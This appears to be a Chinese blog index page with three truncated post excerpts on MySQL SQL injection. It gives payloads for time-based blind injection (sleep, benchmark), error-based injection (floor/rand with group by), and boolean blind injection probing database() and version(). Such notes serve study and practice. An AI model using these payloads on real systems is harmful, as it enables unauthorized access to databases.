摘要: 1.利用sleep() 函数进行注入 payload:and if(ascii(substr(database(),1,1))=115,1,sleep(5))%23 2.当错误的时候会有5秒的时间延时时利用benchmark()进行延时注入 payload:union select (if(subs 阅读全文
posted @ 2018-04-17 10:47 G0mini 阅读(444) 评论(0) 推荐(0) 编辑
摘要: 1.报错注入 payload: union select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a %23 2 阅读全文
posted @ 2018-04-17 10:36 G0mini 阅读(238) 评论(0) 推荐(0) 编辑
摘要: 1.利用left(database(),1)进行尝试 payload: left(version(),1)=5 查看一下version()查看数据库版本号第一位是不是5.返回结果正确。 2.看一下数据库的长度 payload:length(database())=8 当长度为8时,返回正确结果 3. 阅读全文
posted @ 2018-04-17 10:09 G0mini 阅读(199) 评论(0) 推荐(0) 编辑